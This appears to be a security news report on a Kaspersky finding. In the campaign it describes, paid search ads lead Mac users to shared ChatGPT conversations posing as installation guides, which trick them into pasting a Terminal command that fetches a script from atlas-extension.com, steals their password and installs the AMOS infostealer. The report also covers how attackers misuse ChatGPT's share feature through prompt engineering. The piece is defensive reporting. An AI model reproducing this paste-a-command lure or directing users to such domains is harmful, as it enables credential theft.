Kaspersky Threat Research has identified a new malware campaign that uses paid Google search ads and shared conversations on the official ChatGPT website to trick Mac users into running a command that installs the AMOS Atomic macOS Stealer infostealer and a persistent backdoor on their devices.
In the campaign, attackers buy sponsored search ads for queries such as chatgpt atlas and direct users to a page that appears to be an installation guide for ChatGPT Atlas for macOS hosted at chatgpt.com. In reality, the page is a shared ChatGPT conversation generated through prompt engineering and then sanitised so that only the step-by-step installation instructions remain. The guide instructs users to copy a single line of code, open Terminal on macOS, paste the command, and grant all requested permissions.
Kaspersky researchers analysis shows that the command downloads and executes a script from the external domain atlas-extension.com. The script repeatedly prompts the user for their system password and validates the password by attempting to run system commands. Once the correct password is supplied, the script downloads the AMOS infostealer, uses the stolen credentials to install it, and launches the malware. The infection flow represents a variation of the so-called ClickFix technique, in which users are persuaded to manually execute shell commands that retrieve and run code from remote servers.
